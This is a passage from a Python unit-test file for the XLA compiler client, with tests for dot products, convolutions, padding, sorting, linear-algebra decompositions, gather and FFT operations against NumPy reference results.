NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
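    # The nested tuple reads ((lhs_contracting_dims, rhs_contracting_dims),
    # (lhs_batch_dims, rhs_batch_dims)): contract lhs dim 2 against rhs dim 1
    # and batch over dim 0 of both operands, matching np.matmul on the
    # (10, 3, 4) x (10, 4, 5) operands. The proto-based test below sets the
    # same four fields explicitly.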
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
c.DotGeneral(
c.Constant(lhs),
c.Constant(rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
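    # lhs is laid out as (batch=1, features=2, height=3, width=4) and rhs as
    # (output features=1, input features=2, kernel height=1, kernel width=2);
    # Conv uses XLA's default dimension ordering, i.e. NCHW/OIHW here.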
c.Conv(
c.Constant(lhs), c.Constant(rhs), [1, 1], xla_client.PaddingType.SAME)
result = np.array([[[
[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [2, 1], xla_client.PaddingType.VALID)
result = np.array([[[
[640., 700., 760.],
[1120., 1180., 1240.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
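    # pads lists (low, high) edge padding per spatial dimension, and
    # lhs_dilation of 2 along height inserts a zero row between the input rows
    # (transposed-convolution style), which is why the expected result below
    # interleaves zero rows with convolved rows.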
c.ConvWithGeneralPadding(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
c.ConvGeneralDilated(
c.Constant(lhs),
c.Constant(rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(
c.Constant(np.transpose(lhs, (0, 2, 3, 1))), c.Constant(rhs), strides,
pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
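    # feature_group_count=2 makes this a grouped convolution: the two input
    # feature channels are split into two groups, each convolved with its own
    # single-input-channel filter from rhs.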
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
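    # 0x7FFF occupies 15 bits of the 32-bit word, leaving 17 leading zeros;
    # 0x12345678 occupies 29 bits, leaving 3.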
c.Clz(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
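    # Each (low, high, interior) triple below pads one dimension; these are the
    # same edge_padding_low / edge_padding_high / interior_padding fields that
    # the PaddingConfig-based test below sets explicitly.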
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), [(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testReducePrecision(self):
c = self._NewComputation()
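    # Eight exponent bits and seven mantissa bits is the bfloat16 layout, so
    # the f32 mantissa is rounded to 7 bits: 0x1.32fffep-3 -> 0x1.32p-3.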
c.ReducePrecision(
c.Constant(NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[float.fromhex("0x1.32p-3")])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(
c.Constant(NumpyArrayF32(0.)),
c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayF32(lo)),
c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayS32(lo)),
c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
c.Sort(c.Constant(keys))
self._ExecuteAndCompareClose(
c, expected=np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32))
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)), dimension=0)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = b.ParameterFromNumpy(NumpyArrayF32(0))
q0 = b.ParameterFromNumpy(NumpyArrayF32(0))
p1 = b.ParameterFromNumpy(NumpyArrayS32(0))
q1 = b.ParameterFromNumpy(NumpyArrayS32(0))
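    # Comparator parameters arrive as (lhs, rhs) pairs, one pair per sorted
    # operand: (p0, q0) come from the keys and (p1, q1) from the values, so
    # this comparator sorts keys ascending and breaks ties in favor of the
    # larger value.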
b.Or(b.Lt(p0, q0), b.And(b.Eq(p0, q0), b.Gt(p1, q1)))
comparator = b.Build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
c.Eigh(c.Constant(a), full_matrices=True)
# TODO(b/129396575): Turn this test back on when it passes without fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.SVD(c.Constant(a))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(
c.Constant(a_vals),
c.Constant(b_vals),
left_side=False,
lower=True,
transpose_a=True)
self._ExecuteAndCompareClose(
c,
expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32),
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
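    # index_vector_dim=2 means the trailing axis of `indices` holds a
    # (row, col) starting coordinate, and with slice_sizes=[1, 1] each
    # coordinate gathers the single element a[row, col].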
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.fftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# IFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.ifftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
c.Fft(c.Constant(b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.rfftn(b, axes=(1, 2, 3)),
rtol=1e-4)
# IRFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(c, expected=np.fft.irfftn(a, axes=(1, 2, 3)),
rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
